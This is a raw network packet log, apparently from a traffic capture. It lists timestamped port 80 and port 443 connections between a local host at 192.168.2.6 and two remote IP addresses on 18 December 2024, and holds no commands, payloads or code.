                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.072752953 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.073461056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.073587894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.073594093 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.074357033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.074397087 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.074546099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.075246096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.075292110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.075437069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.076160908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.076215982 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.076314926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077089071 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077131033 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077215910 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077944040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077995062 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.078083992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.078864098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.078964949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079122066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079808950 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079849005 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079909086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.080698013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.080745935 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.080848932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.081608057 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.081655979 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.081713915 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.082387924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.082530975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.082551003 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.083347082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.083518028 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.083571911 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.084163904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.084214926 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.084352970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.085160971 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.085218906 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.085270882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.120959044 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.120970964 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.121233940 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.121238947 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206475019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206533909 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206629038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206943989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207056046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207139969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207823992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207880974 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207958937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.208719015 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.208765030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.208841085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.209629059 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.209678888 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.209744930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.210572004 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.210625887 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.210684061 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.211410046 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.211457968 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.211524963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.212485075 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.212544918 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.212562084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.213464022 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.213509083 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.213526011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.214483976 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.214529037 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.214586020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.226795912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.226887941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.226887941 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.227063894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.227121115 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.227324963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228065014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228279114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228331089 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228888988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228943110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229010105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229758024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229819059 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229912996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.230637074 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.230783939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.230829954 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.231502056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.231869936 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.231916904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.232445955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.232624054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.232671022 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.233386040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.233426094 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.233508110 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.234275103 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.234318972 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.234442949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235289097 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235331059 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235457897 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.236136913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.236176014 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.236208916 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.236926079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.236962080 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.237020016 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.237814903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.237860918 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.237988949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.238949060 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.238987923 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.239111900 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.239833117 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.240086079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.240139008 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.241228104 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.241277933 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.241333008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.241763115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.241835117 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.241903067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.242324114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.242429018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.242481947 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.243221045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.243266106 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.243345976 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.244071007 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.244204044 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.244245052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.245040894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.245116949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.245193958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.245873928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.245929003 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.245969057 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.246836901 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.246897936 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.246916056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.247634888 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.247679949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.247992039 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.248631954 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.248689890 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.248897076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.249475956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.249517918 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.249572992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.250380039 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.250437021 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.250459909 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.251283884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.251579046 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.251631021 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.252254009 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.252300978 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.252428055 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.253367901 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.253423929 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.253536940 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.253933907 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.254041910 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.254066944 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.254870892 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.254923105 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.254971981 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.255692005 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.255754948 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.255841970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.256572962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.256618977 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.256680965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.257455111 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.257497072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.257718086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.258349895 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.258394957 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.258483887 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.259287119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.259380102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.259386063 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.260140896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.260195971 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.260313988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.261053085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.261167049 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.261204004 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.262011051 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.262058973 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.262125969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.263082981 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.263143063 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.263571978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.263739109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.263942957 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.264035940 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.264676094 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.264729977 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.398610115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.398698092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.398987055 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.399070978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.399327993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.399378061 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.399827957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.400158882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.400232077 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.400587082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.400682926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.400731087 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.401448965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.401591063 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.401645899 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.402370930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.402574062 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.402628899 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.403263092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.403492928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.403604031 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.404156923 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.404292107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.404337883 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.405191898 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.405422926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.405596018 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.406047106 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.406101942 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.406331062 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418442011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418584108 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418647051 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418860912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.419255018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.419301033 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.419641018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.420196056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.420304060 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.420443058 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421010971 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421145916 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421197891 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421730995 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421838999 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421875000 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.422631979 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.422677040 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.422791958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.423559904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.423619032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.423660994 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.424441099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.424484015 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.424552917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.425318956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.425365925 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.425606012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.426249027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.426342964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.426390886 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.427117109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.427170038 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.427246094 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428028107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428101063 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428153992 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428926945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428989887 CET4980280192.168.2.6139.99.188.124
